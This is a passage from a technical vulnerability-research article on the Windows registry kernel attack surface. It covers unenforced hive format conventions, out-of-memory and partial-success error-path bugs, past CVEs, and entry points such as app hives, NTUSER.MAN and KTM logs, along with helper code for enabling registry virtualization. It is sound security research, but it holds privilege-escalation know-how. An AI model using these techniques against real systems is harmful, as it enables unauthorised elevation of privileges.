existing descriptor is assigned to another key, its reference count is incremented rather than allocating a new object. However, there is no guarantee that a specially crafted hive will not contain multiple duplicates of the same security descriptor, and this is accepted by the loader.Uncompressed key names consisting solely of ASCII characters: Under normal circumstances, if a given key has a name comprising only ASCII characters, it will always be stored in a compressed form, i.e., by writing two bytes of the name in each element of the _CM_KEY_NODE.Name array of type uint16, and setting the KEY_COMP_NAME flag (0x20) in _CM_KEY_NODE.Flags. However, once again, optimal representation of names is not required when loading the hive, and this convention can be ignored without issue.Allocated but unused cells: The Windows registry implementation deallocates objects within a hive when they are no longer needed, making space for new data. However, the loader does not require every cell marked "allocated" to be actively used. Similarly, security descriptors with a reference count of zero are typically deallocated. However, until a November 2024 refactor of the CmpCheckAndFixSecurityCellsRefcount function, it was possible to load a hive with unused security descriptors still present in the linked list. This behavior has since been changed, and unused security descriptors encountered during loading are now automatically freed and removed from the list. These examples illustrate the issue well, but none of them (as far as I know) have particularly significant security implications. However, there were also a few specific memory corruption vulnerabilities that stemmed from the fact that the registry code made theoretically sound assumptions about the hive structure, but they were not unenforced by the loader: CVE-2022-37988: This bug is closely related to the fact that cells larger than 16 KiB are aligned to the nearest power of two in Windows, but this condition doesn't need to be satisfied during loading. This caused the shrinking of a cell to fail, even though it should always succeed in-place, "surprising" the client of the allocator and resulting in a use-after-free condition.CVE-2022-37956: As I described in blog post #5, Windows has some logic to ensure that no leaf-type subkey list (li, lf, or lh) exceeds 511 or 1012 elements, depending on its specific type. If a list is expanded beyond this limit, it is automatically split into two lists, each half the original length. Another reasonable assumption is that the root index length would never approach the maximum value of _CM_KEY_INDEX.Count (uint16) under normal circumstances. This would require an unrealistically large number of subkeys or a very specific sequence of millions of key creations and deletions with specific names. However, it was possible to load a hive containing a subkey list of any of the four types with a length equal to 0xFFFF, and trigger a 16-bit integer overflow on the length field, leading to memory corruption. Interestingly, this is one of the few bugs that could be triggered solely with a single .bat file containing a long sequence of the reg.exe command executions.CVE-2022-38037: In this case, the kernel code assumed that the hive version defined in the header (_HBASE_BLOCK.Minor) always corresponded to the type of subkey lists used in a given hive. For example, if the file version is regf 1.3, it should be impossible for it to contain lists in a format introduced in version 1.5. However, for some reason, the hive loader doesn't enforce the proper relationship between the format version and the structures used in it, which in this case led to a serious hive-based memory corruption vulnerability. As we can see, it is crucial to differentiate between format elements that are conventions adopted by a specific implementation, and those actually enforced during the processing of the input file. If we encounter some code that makes assumptions from the former group that don't belong to the latter one, this could indicate a serious security issue.Susceptibility to mishandling OOM conditions Generally speaking, the implementation of any function in the Windows kernel is built roughly according to the following scheme: NTSTATUS NtHighLevelOperation(...) {   NTSTATUS Status;   Status = HelperFunction1(...);   if (!NT_SUCCESS(Status)) {     //     // Clean up...     //     return Status;   }   Status = HelperFunction2(...);   if (!NT_SUCCESS(Status)) {     //     // Clean up...     //     return Status;   }     //   // More calls...   //   return STATUS_SUCCESS; } Of course, this is a significant simplification, as real-world code contains keywords and constructs such as if statements, switch statements, various loops, and so on. The key point is that a considerable portion of higher-level functions call internal, lower-level functions specialized for specific tasks. Handling potential errors signalled by these functions is an important aspect of kernel code (or any code, for that matter). In low-level Windows code, error propagation occurs using the NTSTATUS type, which is essentially a signed 32-bit integer. A value of 0 signifies success (STATUS_SUCCESS), positive values indicate success but with additional information, and negative values denote errors. The sign of the number is checked by the NT_SUCCESS macro. During my research, I dedicated significant time to analyzing the error handling logic. Let's take a moment to think about the types of errors that could occur during registry operations, and the conditions that might cause them. A common trait of all actions that modify data in the registry is that they allocate memory. The simplest example is the allocation of auxiliary buffers from kernel pools, requested through functions from the ExAllocatePool group. If there is very little available memory at a given point in time, one of the allocation requests may return the STATUS_INSUFFICIENT_RESOURCES error code, which will be propagated back to the original caller. And since we assume that we take on the role of a local attacker who has the ability to execute code on the machine, artificially occupying all available memory is potentially possible in many ways. So this is one way to trigger errors while performing operations on the registry, but admittedly not an ideal way, as it largely depends on the amount of RAM and the maximum pagefile size. Additionally, in a situation where the kernel has so little memory that single allocations start to fail, there is a high probability of the system crashing elsewhere before the vulnerability is successfully exploited. And finally, if several allocations are requested in nearby code in a short period of time, it seems practically impossible to take precise control over which of them will succeed and which will not. Nonetheless, the overall concept of out-of-memory conditions is a very promising avenue for attack, especially considering that the registry primarily operates on memory-mapped hives using its own allocator, in addition to objects from kernel pools. The situation is even more favorable for an attacker due to the 2 GiB size limitation of each of the two storage types (stable and volatile) within a hive. While this is a relatively large value, it is achievable to occupy it in under a minute on today's machines. The situation is even easier if the volatile space that needs to be occupied, as it resides solely in memory and is not flushed to disk – so filling two gigabytes of memory is then a matter of seconds. It can be accomplished, for example, by creating many long registry values, which is a straightforward task when dealing with a controlled hive. However, even in system hives, this is often feasible. To perform data spraying on a given hive, we only need a single key granting us write permissions. For instance, both HKLM\Software and HKLM\System contain numerous keys that allow write access to any user in the system, effectively permitting them to fill it to capacity. Additionally, the "global registry quota" mechanism, implemented by the internal CmpClaimGlobalQuota and CmpReleaseGlobalQuota functions, ensures that the total memory occupied by registry data in the system does not exceed 4 GiB. Besides filling the entire space of a specific hive, this is thus another way to trigger out-of-memory conditions in the registry, especially when targeting a hive without write permissions. A concrete example where this mechanism could have been employed to corrupt the HKLM\SAM system hive is the CVE-2024-26181 vulnerability. Considering all this, it is a fair assumption that a local attacker can cause any call to ExAllocatePool*, HvAllocateCell, and HvReallocateCell (with a length greater than the existing cell) to fail. This opens up a large number of potential error paths to analyze. The HvAllocateCell calls are a particularly interesting starting point for analysis, as there are quite a few of them and almost all of them belong to the attack surface accessible to a regular user: There are two primary reasons why focusing on the analysis of error paths can be a good way to find security bugs. First, it stands to reason that on regular computers used by users, it is extremely rare for a given hive to grow to 2 GiB and run out of space, or for all registry data to simultaneously occupy 4 GiB of memory. This means that these code paths are practically never executed under normal conditions, and even if there were bugs in them, there is a very small chance that they would ever be noticed by anyone. Such rarely executed code paths are always a real treat for security researchers. The second reason is that proper error handling in code is inherently difficult. Many operations involve numerous steps that modify the hive's internal state. If an issue arises during these operations, the registry code must revert all changes and restore the registry to its original state (at least from the macro-architectural perspective). This requires the developer to be fully aware of all changes applied so far when implementing each error path. Additionally, proper error handling must be considered during the initial design of the control flow as well, because some registry actions are irreversible (e.g., freeing cells). The code must thus be structured so that all such operations are placed at the very end of the logic, where errors cannot occur anymore and successful execution is guaranteed. One example of such a vulnerability is CVE-2023-23421, which boiled down to the following code: NTSTATUS CmpCommitRenameKeyUoW(_CM_KCB_UOW *uow) {   // ...   if (!CmpAddSubKeyEx(Hive, ParentKey, NewNameKey) ||       !CmpRemoveSubKey(Hive, ParentKey, OldNameKey)) {     CmpFreeKeyByCell(Hive, NewNameKey);     return STATUS_INSUFFICIENT_RESOURCES;   }   // ... } The issue here was that if the CmpRemoveSubKey call failed, the corresponding error path should have reversed the effect of the CmpAddSubKeyEx function in the previous line, but in practice it didn't. As a result, it was possible to end up with a dangling reference to a freed key in the subkey list, which was a typical use-after-free condition. A second interesting example of this type of bug was CVE-2023-21747, where an out-of-memory error could occur during a highly sensitive operation, hive unloading. As there was no way to revert the state at the time of the OOM, the vulnerability was fixed by Microsoft by refactoring the CmpRemoveSubKeyFromList function and other related functions so that they no longer allocate memory from kernel pools and thus there is no longer a physical possibility of them failing. Finally, I'll mention CVE-2023-38154, where the problem wasn't incorrect error handling, but a complete lack of it – the return value of the HvpPerformLogFileRecovery function was ignored, even though there was a real possibility it could end with an error. This is a fairly classic type of bug that can occur in any programming language, but it's definitely worth keeping in mind when auditing the Windows kernel.Susceptibility to mishandling partial successes The previous section discusses bugs in error handling where each function is responsible for reversing the state it has modified. However, some functions don't adhere to this operational model. Instead of operating on an "all-or-nothing" basis, they work on a best-effort basis, aiming to accomplish as much of a given task as possible. If an error occurs, they leave any changes made in place, e.g., because this result is still preferable to not making any changes. This introduces a third possible output state for such functions: complete success, partial success, and complete failure. This might be problematic, as the approach is incompatible with the typical usage of the NTSTATUS type, which is best suited for conveying one of two (not three) states. In theory, it is a 32-bit integer type, so it could store the additional information of the status being a partial success, and not being unambiguously positive or negative. In practice, however, the convention is to directly propagate the last error encountered within the inner function, and the outer functions very rarely "dig into" specific error codes, instead assuming that if NT_SUCCESS returns FALSE, the entire operation has failed. Such confusion at the cross-function level may have security implications if the outer function should take some additional steps in the event of a partial success of the inner function, but due to the binary interpretation of the returned error code, it ultimately does not execute them. A classic example of such a bug is CVE-2024-26182, which occurred at the intersection of the CmpAddSubKeyEx (outer) and CmpAddSubKeyToList (inner) functions. The problem here was that CmpAddSubKeyToList implements complex, potentially multi-step logic for expanding the subkey list, which could perform a cell reallocation and subsequently encounter an OOM error. On the other hand, the CmpAddSubKeyEx function assumed that the cell index in the subkey list should only be updated in the hive structures if CmpAddSubKeyToList fully succeeds. As a result, the partial success of CmpAddSubKeyToList could lead to a classic use-after-free situation. An attentive reader will probably notice that the return value type of the CmpAddSubKeyToList routine was BOOL and not NTSTATUS, but the bug pattern is identical.Overall complexity introduced over time One of the biggest problems with the modern implementation of the registry is that over the decades of developing this functionality, many changes and new features have been introduced. This has caused the level of complexity of its internal state to increase so much that it seems difficult to grasp for one person, unless they are a full-time registry expert that has worked on it full-time over a period of months or years. I personally believe that the registry existed in its most elegant form somewhere around Windows NT 3.1 – 3.51 (i.e. in the years 1993–1996). At the time, the mechanism was intuitive and logical for both developers and its users. Each object (key, value) either existed or not, each operation ended in either success or failure, and when it was requested on a particular key, you could be sure that it was actually performed on that key. Everything was simple, and black and white. However, over time, more and more shades of gray were being continuously added, departing from the basic assumptions: The existence of predefined keys meant that every operation could no longer be performed on every key, as this special type of key was unsafe for many internal registry functions to use due to its altered semantics.Due to symbolic links, opening a specific key doesn't guarantee that it will be the intended one, as it might be a different key that the original one points to.Registry virtualization has introduced further uncertainty into key operations. When an operation is performed on a key, it is unclear whether the operation is actually executed on that specific key or redirected to a different one. Similarly, with read operations, a client cannot be entirely certain that it is reading from the intended key, as the data may be sourced from a different, virtualized location.Transactions in the registry mean that a given state is no longer considered solely within the global view of the registry. At any given moment, there may also be changes that are visible only within a certain transaction (when they are initiated but not yet committed), and this complex scenario must be correctly handled by the kernel.Layered keys have transformed the nature of hives, making them interdependent rather than self-contained database units. This is due to the introduction of differencing hives, which function solely as "patch diffs" and cannot exist independently without a base hive. Additionally, the semantics of certain objects and their fields have been altered. Previously, a key's existence was directly tied to the presence of a corresponding key node within the hive. Layered keys have disrupted this dependency. Now, a key with a key node can be non-existent if marked as a Tombstone, and a key without a corresponding key node can logically exist if its semantics are Merge-Unbacked, referencing a lower-level key with the same name. Of course, all of these mechanisms were designed and implemented for a specific purpose: either to make life easier for developers/applications using the Registry API, or to introduce some new functionality that is needed today. The problem is not that they were added, but that it seems that the initial design of the registry was simply not compatible with them, so they were sort of forced into the registry, and where they didn't fit, an extra layer of tape was added to hold it all together. This ultimately led to a massive expansion of the internal state that needs to be maintained within the registry. This is evident both in the significant increase in the size of old structures (like KCB) and in the number of new objects that have been added over the years. But the most unfortunate aspect is that each of these more advanced mechanisms seems to have been designed to solve one specific problem, assuming that they would operate in isolation. And indeed, they probably do under typical conditions, but a particularly malicious user could start combining these different mechanisms and making them interact. Given the difficulty in logically determining the expected behavior of some of these combinations, it is doubtful that every such case was considered, documented, implemented, and tested by Microsoft. The relationships between the various advanced mechanisms in the registry are humorously depicted in the image below: Some examples of bugs caused by incorrect interactions between these mechanisms include CVE-2023-21675, CVE-2023-21748, CVE-2023-35356, CVE-2023-35357 and CVE-2023-35358.Entry points This section describes the entry points that a local attacker can use to interact with the registry and exploit any potential vulnerabilities.Hive loading Let's start with the operation of loading user-controlled hives. Since hive loading is only possible from disk (and not, for example, from a memory buffer), this means that to actually trigger this attack surface, the process must be able to create a file with controlled content, or at least a controlled prefix of several kilobytes in length. Regular programs operating at Medium IL generally have this capability, but write access to disk may be restricted for heavily sandboxed processes (e.g. renderer processes in browsers). When it comes to the typical type of bugs that can be triggered in this way, what primarily comes to mind are issues related to binary data parsing, and memory safety violations such as out-of-bounds buffer accesses. It is possible to encounter more logical-type issues, but they usually rely on certain assumptions about the format not being sufficiently verified, causing subsequent operations on such a hive to run into problems. It is very rare to find a vulnerability that can be both triggered and exploited by just loading the hive, without performing any follow-up actions on it. But as CVE-2024-43452 demonstrates, it can still happen sometimes.App hives The introduction of Application Hives in Windows Vista caused a significant shift in the registry attack surface. It allowed unprivileged processes to directly interact with kernel code that was previously only accessible to system services and administrators. Attackers gained access to much of the NtLoadKey syscall logic, including hive file operations, hive parsing at the binary level, hive validation logic in the CmpCheckRegistry function and its subfunctions, and so on. In fact, of the 53 serious vulnerabilities I discovered during my research, 16 (around 30%) either required loading a controlled hive as an app hive, or were significantly easier to trigger using this mechanism. It's important to remember that while app hives do open up a broad range of new possibilities for attackers, they don't offer exactly the same capabilities as loading normal (non-app) hives due to several limitations and specific behaviors: They must be loaded under the special path \Registry\A, which means an app hive cannot be loaded just anywhere in the registry hierarchy. This special path is further protected from references by a fully qualified path, which also reduces their usefulness in some offensive applications.The logic for unloading app hives differs from unloading standard hives because the process occurs automatically when all handles to the hive are closed, rather than manually unloading the hive through the RegUnLoadKeyW API or its corresponding syscall from the NtUnloadKey family.Operations on app hive security descriptors are very limited: any calls to the RegSetKeySecurity function or RegCreateKeyExW with a non-default security descriptor will fail, which means that new descriptors cannot be added to such hives.KTM transactions are unconditionally blocked for app hives. Despite these minor restrictions, the ability to load arbitrary hives remains one of the most useful tools when exploiting registry bugs. Even if binary control of the hive is not strictly required, it can still be valuable. This is because it allows the attacker to clearly define the initial state of the hive where the attack takes place. By taking advantage of the cell allocator's determinism, it is often possible to achieve 100% exploitation success.User hives and Mandatory User Profiles Sometimes, triggering a specific bug requires both binary control over the hive and certain features that app hives lack, such as the ability to open a key via its full path. In such cases, an alternative to app hives exists, which might be slightly less practical but still allows for exploiting these more demanding bugs. It involves directly modifying one of the two hives assigned to every user in the system: the user hive (C:\Users\NTUSER.DAT mounted under \Registry\User\, or in other words, HKCU) or the user classes hive (C:\Users\AppData\Local\Microsoft\Windows\UsrClass.dat mounted under \Registry\User\_Classes). Naturally, when these hives are actively used by the system, access to their backing files is blocked, preventing simultaneous modification, which complicates things considerably. However, there are two ways to circumvent this problem. The first scenario involves a hypothetical attacker who has two local accounts on the targeted system, or similarly, two different users collaborating to take control of the computer (let's call them users A and B). User A can grant user B full rights to modify their hive(s),  and then log out. User B then makes all the required binary changes to the hive and finally notifies user A that they can log back in. At this point, the Profile Service loads the modified hive on behalf of that user, and the initial goal is achieved. The second option is more practical as it doesn't require two different users. It abuses Mandatory User Profiles, a system functionality that prioritizes the NTUSER.MAN file in the user's directory over the NTUSER.DAT file as the user hive, if it exists (it doesn't exist in the default system installation). This means that a single user can place a specially prepared hive under the NTUSER.MAN name in their home directory, then log out and log back in. Afterwards, NTUSER.MAN will be the user's active HKCU key, achieving the goal. However, the technique also has some drawbacks – it only applies to the user hive (not UsrClass.dat), and it is somewhat noisy. Once the NTUSER.MAN file has been created and loaded, there is no way to delete it by the same user, as it will always be loaded by the system upon login, effectively blocking access to it. A few examples of bugs involving one of the two above techniques are CVE-2023-21675, CVE-2023-35356, and CVE-2023-35633. They all required the existence of a special type of key called a predefined key within a publicly accessible hive, such as HKCU. Even when predefined keys were still supported, they could not be created using the system API, and the only way to craft them was by directly setting a specific flag within the internal key node structure in the hive file.Log file parsing: .LOG/.LOG1/.LOG2 One of the fundamental features of the registry is that it guarantees consistency at the level of interdependent cells that together form the structure of keys within a given hive. This refers to a situation where a single operation on the registry involves the simultaneous modification of multiple cells. Even if there is a power outage and the system restarts in the middle of performing this operation, the registry guarantees that all intermediate changes will either be applied or discarded. Such "atomicity" of operations is necessary in order to guarantee the internal consistency of the hive structure, which, as we know, is important to security. The mechanism is implemented by using additional files associated with the hive, where the intermediate state of registry modifications is saved with the granularity of a memory page (4 KiB), and which can be safely rolled forward or rolled back at the next hive load. Usually these are two files with the .LOG1 and .LOG2 extensions, but it is also possible to force the use of a single log file with the .LOG extension by passing the REG_HIVE_SINGLE_LOG flag to syscalls from the NtLoadKey family. Internally, each LOG file can be encoded in one of two formats. One is the "legacy log file", a relatively simple format that has existed since the first implementation of the registry in Windows NT 3.1. Another one is the "incremental log file", a slightly more modern and complex format introduced in Windows 8.1 to address performance issues that plagued the previous version. Both formats use the same header as the normal regf format (the first 512 bytes of the _HBASE_BLOCK structure, up to the CheckSum field), with the Type field set to 0x1 (legacy log file on Windows XP and newer), 0x2 (legacy log file on Windows 2000 and older), or 0x6 (incremental log file). Further at offset 0x200, legacy log files contain the signature 0x54524944 ("DIRT") followed by the "dirty vector", while incremental log files contain successive records represented by the magic value 0x454C7648 ("HvLE"). These formats are well-documented in two unofficial regf documentations: GitHub: libyal/libregf and GitHub: msuhanov/regf.  Additional information can be found in the "Stable storage" and "Incremental logging" subsections of the Windows Internals (Part 2, 7th Edition) book and its earlier editions. From a security perspective, it's important to note that LOG files are processed for app hives, so their handling is part of the local attack surface. On the other hand, this attack surface isn't particularly large, as it boils down to just a few functions that are called by the two highest-level routines: HvAnalyzeLogFiles and HvpPerformLogFileRecovery. The potential types of bugs are also fairly limited, mainly consisting of shallow memory safety violations. Two specific examples of vulnerabilities related to this functionality are CVE-2023-35386 and CVE-2023-38154.Log file parsing: KTM logs Besides ensuring atomicity at the level of individual operations, the Windows Registry also provides two ways to achieve atomicity for entire groups of operations, such as creating a key and setting several of its values as part of a single logical unit. These mechanisms are based on two different types of transactions: KTM transactions (managed by the Kernel Transaction Manager, implemented by the tm.sys driver) and lightweight transactions, which were designed specifically for the registry. Notably, lightweight transactions exist in memory only and are never written to disk, so they do not represent an attack vector during hive loading, because there is no file recovery logic. KTM transactions are available for use in any loaded hive that doesn't have the REG_APP_HIVE and REG_HIVE_NO_RM flags. To utilize them, a transaction object must first be created using the CreateTransaction API. The resulting handle is then passed to the RegOpenKeyTransacted, RegCreateKeyTransacted, or RegDeleteKeyTransacted registry functions. Finally, the entire transaction is committed via CommitTransaction. Windows attempts to guarantee that active transactions that are caught mid-commit during a sudden system shutdown will be rolled forward when the hive is loaded again. To achieve this, the Windows kernel employs the Common Log File System interface to save serialized records detailing individual operations to the .blf files that accompany the main hive file. When a hive is loaded, the system checks for unapplied changes in these .blf files. If any are found, it deserializes the individual records and attempts to redo all the actions described within them. This logic is primarily handled by the internal functions CmpRmAnalysisPhase, CmpRmReDoPhase, and CmpRmUnDoPhase, as well as the functions surrounding them in the control flow graph. Given that KTM transactions are never enabled for app hives, the possibility of an unprivileged user exploiting this functionality is severely limited. The only option is to focus on KTM log files associated with regular hives that a local user has some control over, namely the user hive (NTUSER.DAT) and the user classes hive (UsrClass.dat). If a transactional operation is performed on a user's HKCU hive, additional .regtrans-ms and .blf files appear in their home directory. Furthermore, if these files don't exist at first, they can be planted on the disk manually, and will be processed by the Windows kernel after logging out and logging back in. Interestingly, even when the KTM log files are actively in use, they have the read sharing mode enabled. This means that a user can write data to these logs by performing transactional operations, and read from them directly at the same time. Historically, the handling of KTM logs has been affected by a significant number of security issues. Between 2019 and 2020, James Forshaw reported three serious bugs in this code: CVE-2019-0959, CVE-2020-1377, and CVE-2020-1378. Subsequently, during my research, I discovered three more: CVE-2023-28271, CVE-2023-28272, and CVE-2023-28293. However, the strangest thing is that, according to my tests, the entire logic for restoring the registry state from KTM logs stopped working due to code refactoring introduced in Windows 10 1607 (almost 9 years ago) and has not been fixed since. I described this observation in another report related to transactions, in a section called "KTM transaction recovery code". I'm not entirely sure whether I'm making a mistake in testing, but if this is truly the case, it means that the entire recovery mechanism currently serves no purpose and only needlessly increases the system's attack surface. Therefore, it could be safely removed or, at the very least, actually fixed.Direct registry operations through standard syscalls Direct operations on keys and values are the core of the registry and make up most of its associated code within the Windows kernel. These basic operations don't need any special permissions and are accessible by all users, so they constitute the primary attack surface available to a local attacker. These actions have been summarized at the beginning of blog post #2, and should probably be familiar by now. As a recap, here is a table of the available operations, including the corresponding high-level API function, system call name, and internal kernel function name if it differs from the syscall: Operation name Registry API name(s) System call(s) Internal kernel handler (if different than syscall) Load hive RegLoadKey RegLoadAppKey NtLoadKeyNtLoadKey2 NtLoadKeyEx NtLoadKey3 - Count open subkeys in hive - NtQueryOpenSubKeys - Flush hive RegFlushKey NtFlushKey - Open key RegOpenKeyEx RegOpenKeyTransacted NtOpenKey NtOpenKeyEx NtOpenKeyTransacted NtOpenKeyTransactedEx CmpParseKey Create key RegCreateKeyEx RegCreateKeyTransacted NtCreateKey NtCreateKeyTransacted CmpParseKey Delete key RegDeleteKeyExRegDeleteKeyTransacted NtDeleteKey - Rename key RegRenameKey NtRenameKey - Set key security RegSetKeySecurity NtSetSecurityObject CmpSecurityMethod Query key security RegGetKeySecurity NtQuerySecurityObject CmpSecurityMethod Set key information - NtSetInformationKey - Query key information RegQueryInfoKey NtQueryKey - Enumerate subkeys RegEnumKeyEx NtEnumerateKey - Notify on key change RegNotifyChangeKeyValue NtNotifyChangeKey NtNotifyChangeMultipleKeys - Query key path - NtQueryObject CmpQueryKeyName Close key handle RegCloseKey NtClose CmpCloseKeyObject CmpDeleteKeyObject Set value RegSetValueEx NtSetValueKey - Delete value RegDeleteValue NtDeleteValueKey - Enumerate values RegEnumValue NtEnumerateValueKey - Query value data RegQueryValueEx NtQueryValueKey - Query multiple values RegQueryMultipleValues NtQueryMultipleValueKey - Some additional comments:A regular user can directly load only application hives, using the RegLoadAppKey function or its corresponding syscalls with the REG_APP_HIVE flag. Loading standard hives, using the RegLoadKey function, is reserved for administrators only. However, this operation is still indirectly accessible to other users through the NTUSER.MAN hive and the Profile Service, which can load it as a user hive during system login.When selecting API functions for the table above, I prioritized their latest versions (often with the "Ex" suffix, meaning "extended"). I also chose those that are the thinnest wrappers and closest in functionality to their corresponding syscalls on the kernel side. In the official Microsoft documentation, you'll also find many older/deprecated versions of these functions, which were available in early Windows versions and now exist solely for backward compatibility (e.g., RegOpenKey, RegEnumKey). Additionally, there are also helper functions that implement more complex logic on the user-mode side (e.g., RegDeleteTree, which recursively deletes an entire subtree of a given key), but they don't add anything in terms of the kernel attack surface.There are several operations natively supported by the kernel that do not have a user-mode equivalent, such as NtQueryOpenSubKeys or NtSetInformationKey. The only way to use these interfaces is to call their respective system calls directly, which is most easily achieved by calling their wrappers with the same name in the ntdll.dll library. Furthermore, even when a documented API function exists, it may not expose all the capabilities of its corresponding system call. For example, the RegQueryKeyInfo function returns some information about a key, but much more can be learned by using NtQueryKey directly with one of the supported information classes. Moreover, there is a group of syscalls that do require administrator rights (specifically SeBackupPrivilege, SeRestorePrivilege, or PreviousMode set to KernelMode). These syscalls are used either for registry management by the kernel or system services, or for purely administrative tasks (such as performing registry backups). They are not particularly interesting from a security research perspective, as they cannot be used to elevate privileges, but it is worth mentioning them by name:NtCompactKeysNtCompressKeyNtFreezeRegistryNtInitializeRegistryNtLockRegistryKeyNtQueryOpenSubKeysExNtReplaceKeyNtRestoreKeyNtSaveKeyNtSaveKeyExNtSaveMergedKeysNtThawRegistryNtUnloadKeyNtUnloadKey2NtUnloadKeyExIncorporating advanced features Despite the fact that most power users are familiar with the basic registry operations (e.g., from using Regedit.exe), there are still some modifiers that can change the behavior of these operations, thereby complicating their implementation and potentially leading to interesting bugs. To use these modifiers, additional steps are often required, such as enabling registry virtualization, creating a transaction, or loading a differencing hive. When this is done, the information about the special key properties are encoded within the internal kernel structures, and the key handle itself is almost indistinguishable from other handles as seen by the user-mode application. When operating on such advanced keys, the logic for their handling is executed in the standard registry syscalls transparently to the user. The diagram below illustrates the general, conceptual control flow in registry-related system calls: This is a very simplified outline of how registry syscalls work, but it shows that a function theoretically supporting one operation can actually hide many implementations that are dynamically chosen based on various factors. In terms of specifics, there are significant differences depending on the operation and whether it is a "read" or "write" one. For example, in "read" operations, the execution paths for transactional and non-transactional operations are typically combined into one that has built-in transaction support but can also operate without them. On the other hand, in "write" operations, normal and transactional operations are always performed differently, but there isn't much code dedicated to layered keys (except for the so-called key promotion operations), since when writing to a layered key, the state of keys lower on the stack is usually not as important. As for the "Internal operation handler" area marked within the large rectangle with the dotted line, these are internal functions responsible for the core logic of a specific operation, and whose names typically begin with "Cm" instead of "Nt". For example, for the NtDeleteKey syscall, the corresponding internal handler is CmDeleteKey, for NtQueryKey it is CmQueryKey, for NtEnumerateKey it is CmEnumerateKey, and so on. In the following sections, we will take a closer look at each of the possible complications.Predefined keys and symbolic links Predefined keys were deprecated in 2023, so I won't spend much time on them here. It's worth mentioning that on modern systems, it wasn't possible to create them in any way using the API, or even directly using syscalls. The only way to craft such a key in the registry was to create it in binary form in a controlled hive file and have it loaded via RegLoadAppKey or as a user hive. These keys had very strange semantics, both at the key node level (unusual encoding of _CM_KEY_NODE.ValueList) and at the kernel key body object level (non-standard value of _CM_KEY_BODY.Type). Due to the need to filter out these keys at an early stage of syscall execution, there are special helper functions whose purpose is to open the key by handle and verify whether it is or isn't a predefined handle (CmObReferenceObjectByHandle and CmObReferenceObjectByName). Consequently, hunting for bugs related to predefined handles involved verifying whether each syscall used the above wrappers correctly, and whether there was some other way to perform an operation on this type of key while bypassing the type check. As I have mentioned, this is now just a thing of the past, as predefined handles in input hives are no longer supported and therefore do not pose a security risk to the system. When it comes to symbolic links, this is a semi-documented feature that requires calling the RegCreateKeyEx function with the special REG_OPTION_CREATE_LINK flag to create them. Then, you need to set a value named "SymbolicLinkValue" and of type REG_LINK, which contains the target of the symlink as an absolute, internal registry path (\Registry\...) written using wide characters. From that point on, the link points to the specified path. However, it's important to remember that traversing symbolic links originating from non-system hives is heavily restricted: it can only occur within a single "trust class" (e.g., between the user hive and user classes hive of the same user). As a result, links located in app hives are never fully functional, because each app hive resides in its own isolated trust class, and they cannot reference themselves either, as references to paths starting with "\Registry\A" are blocked by the Windows kernel. As for auditing symbolic links, they are generally resolved during the opening/creation of a key. Therefore, the analysis mainly involves the CmpParseKey function and lower-level functions called within it, particularly CmpGetSymbolicLinkTarget, which is responsible for reading the target of a given symlink and searching for it in existing registry structures. Issues related to symlinks can also be found in registry callbacks registered by third-party drivers, especially those that handle the RegNtPostOpenKey/RegNtPostCreateKey and similar operations. Correctly handling "reparse" return values and the multiple call loops performed by the NT Object Manager is not an easy feat to achieve.Registry virtualization Registry virtualization, introduced in Windows Vista, ensures backward compatibility for older applications that assume administrative privileges when using the registry. This mechanism redirects references between HKLM\Software and HKU\_Classes\VirtualStore subkeys transparently, allowing programs to "think" they write to the system hive even though they don't have sufficient permissions for it. The virtualization logic, integrated into nearly every basic registry syscall, is mostly implemented by three functions: CmKeyBodyRemapToVirtualForEnum: Translates a real key inside a virtualized hive (HKLM\Software) to a virtual key inside the VirtualStore of the user classes hive during read-type operations. This is done to merge the properties of both keys into a single state that is then returned to the caller.CmKeyBodyRemapToVirtual: Translates a real key to its corresponding virtual key, and is used in the key deletion and value deletion operations. This is done to delete the replica of a given key in VirtualStore or one of its values, instead of its real instance in the global hive.CmKeyBodyReplicateToVirtual: Replicates the entire key structure that the caller wants to create in the virtualized hive, inside of the VirtualStore. All of the above functions have a complicated control flow, both in terms of low-level implementation (e.g., they implement various registry path conversions) and logically – they create new keys in the registry, merge the states of different keys into one, etc. As a result, it doesn't really come as a big surprise that the code has been affected by many vulnerabilities. Triggering virtualization doesn't require any special rights, but it does need a few conditions to be met: Virtualization must be specifically enabled for a given process. This is not the default behavior for 64-bit programs but can be easily enabled by calling the SetTokenInformation function with the TokenVirtualizationEnabled argument on the security token of the process.Depending on the desired behavior, the appropriate combination of VirtualSource/VirtualTarget/VirtualStore flags should be set in _CM_KEY_NODE.Flags. This can be achieved either through binary control over the hive or by setting it at runtime using the NtSetInformationKey call with the KeySetVirtualizationInformation argument.The REG_KEY_DONT_VIRTUALIZE flag must not be set in the _CM_KEY_NODE.VirtControlFlags field for a given key. This is usually not an issue, but if necessary, it can be adjusted either in the binary representation of the hive or using the NtSetInformationKey call with the KeyControlFlagsInformation argument.In specific cases, the source key must be located in a virtualizable hive. In such scenarios, the HKLM\Software\Microsoft\DRM key becomes very useful, as it meets this condition and has a permissive security descriptor that allows all users in the system to create subkeys within it. With regards to the first two points, many examples of virtualization-related bugs can be found in the Project Zero bug tracker. These reports include proof-of-concept code that correctly sets the appropriate flags. For simplicity, I will share that code here as well; the two C++ functions responsible for enabling virtualization for a given security token and registry key are shown below: BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {   DWORD dwVirtualizationEnabled = bEnabled;   return SetTokenInformation(hToken,                              TokenVirtualizationEnabled,                              &dwVirtualizationEnabled,                              sizeof(dwVirtualizationEnabled)); } BOOL EnableKeyVirtualization(HKEY hKey,                              BOOL VirtualTarget,                              BOOL VirtualStore,                              BOOL VirtualSource) {   KEY_SET_VIRTUALIZATION_INFORMATION VirtInfo;   VirtInfo.VirtualTarget = VirtualTarget;   VirtInfo.VirtualStore = VirtualStore;   VirtInfo.VirtualSource = VirtualSource;   VirtInfo.Reserved = 0;   NTSTATUS Status = NtSetInformationKey(hKey,                                         KeySetVirtualizationInformation,                                         &VirtInfo,                                         sizeof(VirtInfo));   return NT_SUCCESS(Status); } And their example use: HANDLE hToken; HKEY hKey; // // Enable virtualization for the token. // if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {   printf("OpenProcessToken failed with error %u\n", GetLastError());   return 1; } EnableTokenVirtualization(hToken, TRUE); // // Enable virtualization for the key. // hKey = RegOpenKeyExW(...); EnableKeyVirtualization(hKey,                         /*VirtualTarget=*/TRUE,                         /*VirtualStore=*/ TRUE,                         /*VirtualSource=*/FALSE);Transactions There are two types of registry transactions: KTM and lightweight. The former are transactions implemented on top of the tm.sys (Transaction Manager) driver, and they try to provide certain guarantees of transactional atomicity both during system run time and even across reboots. The latter, as the name suggests, 